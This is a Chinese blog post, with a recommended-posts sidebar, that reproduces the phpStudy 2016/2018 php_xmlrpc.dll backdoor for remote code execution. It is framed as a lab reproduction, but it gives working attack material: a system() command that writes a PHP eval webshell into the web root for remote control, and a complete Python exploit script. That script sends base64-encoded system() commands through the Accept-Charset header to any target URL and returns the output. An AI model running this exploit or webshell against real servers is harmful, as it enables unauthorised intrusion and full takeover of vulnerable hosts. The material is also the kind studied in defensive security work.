phpstudy_2016-2018_rce_backdoor漏洞复现

于 2024-07-31 10:58:10 发布
阅读量421 收藏 3
点赞数 3
文章标签: php windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46365325/article/details/140817286
版权

phpstudy_2016-2018_rce_backdoor

说明内容
漏洞编号phpstudy_2016-2018_rce
漏洞名称RCE(Remote Command|Code Execute)
漏洞评级高危
影响范围phpStudy 2016、phpStudy 2018
漏洞描述攻击者可以利用该漏洞执行PHP 命令,也可以称作 phpStudy 后门 。

漏洞描述

攻击者可以利用该漏洞执行 PHP 命令,也可以称作 phpstudy 后门。RCE(Remote Command| Code Execute)
PHP study 软件是国内的一款免费的 PHP 调试环境的程序集成包,通过集成 Apache、PHP、Mysql、PhpMyAdmin 等多款软件一次性安装,无需配置即可直接安装使用,一键搭建。其中2016、2018版本的 PHPstudy 存在被黑客恶意篡改后形成的RCE漏洞。该漏洞可以执行远程执行系统命令。

漏洞等级

高危

影响版本

后门代码存在于\exp\php_xmlrpc.dll 模块中,至少有2个版本:phpStudy2016 和 phpstudy 2018自带的php-5.2.17、php-5.4.45。

漏洞复现

基础环境

组件版本
OSWindows 2016 Standerd
Web ServerphpStudy 2016(特别版)

漏洞扫描

  • Windows 可以访问server2016

image.png

  • 启动bp工具抓取服务器与浏览器之间的流量。
  • 发送到 Repeater 模块。
    image.png

漏洞验证

触发条件
更改 bp 字体为楷体24pt
image.png

image.png

image.png

image.png

image.png

深度利用

第一种方式:

  • 利用 bp 执行系统命令
    • phpstudy 软件被插入后门,通过 php system函数执行系统命令,所以我们也可以通过system() 函数写入webshell。
 system(' echo ^<?php @eval($_POST["cmd"]); ?^>>C:/phpstudy_2016/WWW/shell.php ');

使用bp编码后进行上传,在网页查看是否上传成功,使用蚁剑进行连接。

image.png
image.png
image.png

第二种方式:

  • 使用 python 脚本,显现命令框控制。
    image.png

  • 安装requests

pip install requests
  • 代码:
import requests
import base64
import sys
 
banner = '''
.---. .-.          .--.  .-.          .-.        .---.  .--.  .--. 
: .; :: :         : .--'.' `.         : :        : .; :: .--': .--'
:  _.': `-. .---. `. `. `. .'.-..-. .-' :.-..-.  :   .': :   : `;  
: :   : .. :: .; ` _`, : : : : :; :' .; :: :; :  : :.`.: :__ : :__ 
:_;   :_;:_;: ._.'`.__.' :_; `.__.'`.__.'`._. ;  :_;:_;`.__.'`.__.'
            : :                           .-. :                    
            :_;                           `._.'                    
                python *.py http://10.4.7.130/phpinfo.php
'''
 
if len(sys.argv) < 2:
    print(banner)
    exit()
 
url = sys.argv[1]
 
def attack(cmd):
    cmd = f"system('{cmd}');"
    cmd = base64.b64encode(cmd.encode())
 
    headers = {
        "User-Agent"        : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0",
        "Accept-Charset"    : cmd,
        "Accept-Encoding"   : "gzip,deflate"
    }
 
    res = requests.get(url = url,headers = headers)
    rs = res.content.decode("gb2312")
    result = rs[0:rs.find("DOCTYPE html")]
    return result
 
if __name__ == '__main__':
    cmd = input("请输入想要执行的系统命令:")
    if cmd == 'q':
        print("感谢使用!!!")
    else:
        print(attack(cmd))
Y小冉
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpstudy2016 RCE漏洞验证
m0_56578216的博客
09-21 469
PHPStudyRCE(Remote Code Execution),也称为phpstudy_backdoor漏洞,是指软件中存在的一个远程代码执行漏洞
phpstudy后门简单分析
fa1lr4in的小博客
09-25 1711
感谢pcat师傅的文章:https://mp.weixin.qq.com/s/dIDfgFxHlqenKRUSW7Oqkw 20号得知phphstudy有后门,不知道官网的是不是也被入侵了,当时没有进行查看,,,由于当时正在秋招面试比较忙,鸽了几天有了下文: 被中马的为php_xmlrpc.dll这个dll文件,这个可以通过查找泄露字符串很容易通过脚本实现,就不贴了,可以以eval为关键...
phpstudy_2016-2018_rce_backdoor 漏洞复现
weixin_51559599的博客
10-16 317
修改 Accept-Encoding,删除 deflate 前的空格。查看 http 历史,找到刚刚访问的 php 页面。将要执行的命令写入到 system(“”) 中如。Decoder 模块 base64 编码。发送到 Repeater。转到 Repeater。php 页面请求内容加。点击 Send 发送。
phpstudy_2016-2018_rce漏洞复现
m0_64583632的博客
11-10 903
phpstudy2016phpstudy2018rce漏洞复现
phpstudy_2016-2018_rce_backdoor后门漏洞复现
qq_58683895的博客
10-16 290
攻击者可以利用该漏洞执行PHP 命令,也可以称作phpStudy 后门。
PhpStudy2016-2018-RCE 漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-14 1290
Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin等多款软件一次性安装,无需配置即可直接安装使用,一键搭建。这是常用来写webshell的一句话,请注意使用这样的代码是非常危险的,因为它允许任意的命令执行和操纵服务器文件系统。需要注意的是,该漏洞只影响使用了特定版本的PHPStudy软件的系统,具体来说是2018年1月至2019年5月发布的版本。通过利用该漏洞,攻击者可以执行任意的PHP代码,从而完全控制受影响的系统。
phpstudy_2016-2018_rce_hackdoor利用脚本
weixin_52963334的博客
09-22 39
漏洞利用poc编写
PHP常见后门修复,phpStudy后门RCE复现/批量脚本/修复
weixin_33416318的博客
03-10 623
phpStudy后门介绍phpStudy是国内一款免费的PHP环境集成包,集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer等多款软件,无需配置即可直接安装使用,有着近百万PHP用户。近日被爆出phpStudy存在RCE后门,并通过验证复现。软件作者声明:phpstudy 2016PHP5.4存在后门。实际测试官网下载phpstudy2018php-5.2....
java 漏洞复现_漏洞复现
weixin_35600177的博客
03-02 175
个人漏洞复现记录以及EXP编写。漏洞phpstudy实测2016PHP-5.4,2018PHP-5.2.17和PHP-5.4.45都存在此漏洞注意请求头的Accept-Encoding后应去掉空格,Accept-Charset后值为base64编码,c3lzdGVtKCd3aG9hbWknKTs=解密为system('whoami');注意后面有分号Shiro RCE(cve-2016-44...
phpStudy_install_phpStudy_install
09-20
phpStudy安装详解】 phpStudy是一款非常流行的PHP开发环境集成包,它包含了PHP、Apache、MySQL等组件,方便开发者在Windows环境下快速搭建Web服务器。在本文中,我们将深入探讨phpStudy的安装过程及其核心功能,...
phpstudy_2016.11.03.zip
03-14
phpstudy_2016.11.03这个压缩包中,包含了PHPStudy的主要组件和相关配置文件。用户解压后,可以找到phpStudy.exe主程序,通过双击运行,即可启动PHPStudy的控制台。控制台界面简洁明了,提供了如新建网站、修改...
phpstudy_rce.py
10-11
phpstudy_rce
phpStudy_2016.11.03后门版.zip
09-29
在本例中,"phpStudy_2016.11.03后门版.zip"是一个包含了可能含有恶意后门的PHP开发环境——phpStudy的版本。phpStudy是一款广泛使用的集成PHP开发环境,它集成了Apache服务器、MySQL数据库以及PHP等组件,方便...
phpStudy_32.7z
08-11
phpstudy官网链接.url”是phpStudy官方网站的快捷方式,用户可以通过访问官网获取最新版本、更新信息、技术支持以及社区资源。官网通常会提供详细的教程、常见问题解答和用户反馈通道。 六、实战应用 在实际开发...
RCEphp文件上传
最新发布
m0_71332744的博客
07-30 554
在网络安全领域,远程命令执行(RCE)和文件上传漏洞是两种常见的攻击方式。本文将带大家深入了解这两种漏洞的原理、利用方法以及如何进行有效防御。
53、PHP 实现归并排序
weixin_44010641的博客
07-30 194
【代码】53、PHP 实现归并排序。
WordPress原创插件:搜索引擎抓取首图seo图片
爱酷码的博客
07-29 366
WordPress原创插件:搜索引擎抓取首图seo图片。
PHP框架详解 - symfony框架
丁爸的博客
07-28 970
Symphony框架是一个功能强大、稳定可靠、易于扩展和定制的开源Web框架,适用于构建各种类型的Web应用程序。虽然在某些情况下可能会遇到一些性能和学习曲线的挑战,但是通过合理的配置和优化,以及积极的学习和实践,可以充分发挥Symphony框架的优势,构建高质量的Web应用程序。Symphony框架是一个基于PHP的开源Web框架,它提供了一套丰富的组件和工具,可以帮助开发者更轻松地构建高质量的Web应用程序。
phpstudy sql_mode=only_full_group_by -advertisement
04-30
phpstudy sql_mode=only_full_group_by -advertisement是指在phpstudy中设置MySQL的sql_mode为only_full_group_by,这个模式可以使MySQL在执行GROUP BY语句时更加严格。 在MySQL执行GROUP BY语句时,会将相同的行分组并统计,但有时在分组的字段中可能有一些非空的空值,这时MySQL在默认情况下会将这些空值也视作相同的值进行分组并统计,这可能会导致统计结果出现错误。 而only_full_group_by模式可以在分组时排除空值,只对真正有值的字段进行分组和统计,这样可以确保统计结果的正确性。 然而,启用only_full_group_by模式会使MySQL对语句执行更多的检查和计算,降低了查询的效率,因此在一些MySQL版本中默认关闭了这个模式。如果需要启用,需要手动设置sql_mode为包含only_full_group_by的值。 至于-advertisement部分,可能是意味着这是一条非广告的信息或公告。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值